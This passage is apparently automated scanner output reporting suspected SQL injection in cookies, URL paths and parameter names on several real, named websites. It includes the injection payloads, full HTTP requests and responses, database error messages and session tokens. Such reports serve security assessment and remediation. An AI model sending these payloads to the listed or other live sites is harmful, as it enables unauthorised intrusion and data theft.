<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" ce
...[SNIP]...

1.73. http://www.friedfrank.com/index.cfm [__utma cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.friedfrank.com
Path:	/index.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 48537269'%20or%201%3d1--%20 and 48537269'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.148537269'%20or%201%3d1--%20; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:13:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 21-Apr-2010 06:13:42 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.148537269'%20or%201%3d2--%20; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:13:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8








































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="<STRONG>Ianis Girgenson </STRONG>is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. <BR><BR>Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.<BR><BR>Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank > Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.74. http://www.friedfrank.com/index.cfm [__utmb cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.friedfrank.com
Path:	/index.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 21775514'%20or%201%3d1--%20 and 21775514'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.130308879521775514'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:14:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Wed, 21-Apr-2010 06:14:17 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.130308879521775514'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:14:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8








































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="<STRONG>Ianis Girgenson </STRONG>is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. <BR><BR>Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.<BR><BR>Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank > Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.75. http://www.friedfrank.com/index.cfm [__utmc cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.friedfrank.com
Path:	/index.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 19469349%20or%201%3d1--%20 and 19469349%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=11304187519469349%20or%201%3d1--%20; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 21-Apr-2010 06:14:02 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=11304187519469349%20or%201%3d2--%20; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8








































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="<STRONG>Ianis Girgenson </STRONG>is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. <BR><BR>Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.<BR><BR>Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank > Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.76. http://www.friedfrank.com/index.cfm [__utmz cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.friedfrank.com
Path:	/index.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 13351191'%20or%201%3d1--%20 and 13351191'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)13351191'%20or%201%3d1--%20; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:13:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 21-Apr-2010 06:13:28 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)13351191'%20or%201%3d2--%20; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:13:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8








































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="<STRONG>Ianis Girgenson </STRONG>is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. <BR><BR>Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.<BR><BR>Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank > Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.77. http://www.longislanderotic.com/forum [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.longislanderotic.com
Path:	/forum

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /forum?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.longislanderotic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 18:13:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: WWF=SID=b88fzzeb72437c112fee69314ce4df5f; path=/longislanderotic
Set-Cookie: ASPSESSIONIDQSCDACTQ=MNMDDPPBOGEADHEAEFIHMPPH; path=/
Cache-control: private

<br /><strong>Server Error in Forum Application</strong><br />An error has occured while writing to the database.<br />Please contact the forum administrator.<br /><br /><strong>Support Error Code:-</
...[SNIP]...
<br />Microsoft OLE DB Provider for SQL Server<br />
...[SNIP]...

1.78. http://www.millerwelds.com/about/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/about/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:38 GMT
Connection: Keep-Alive
Content-Length: 27686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.79. http://www.millerwelds.com/about/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/about/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:58 GMT
Connection: Keep-Alive
Content-Length: 20770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=is
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /about/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:59 GMT
Connection: Keep-Alive
Content-Length: 22492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=is
...[SNIP]...

1.80. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/about/certifications.html

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about'/certifications.html HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:30 GMT
Connection: Keep-Alive
Content-Length: 27705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.81. http://www.millerwelds.com/about/certifications.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/about/certifications.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about/certifications.html' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:32 GMT
Connection: Keep-Alive
Content-Length: 27732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/about/certifications.html''' at line 1)<br>
...[SNIP]...

1.82. http://www.millerwelds.com/about/certifications.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/about/certifications.html

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about/certifications.html?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
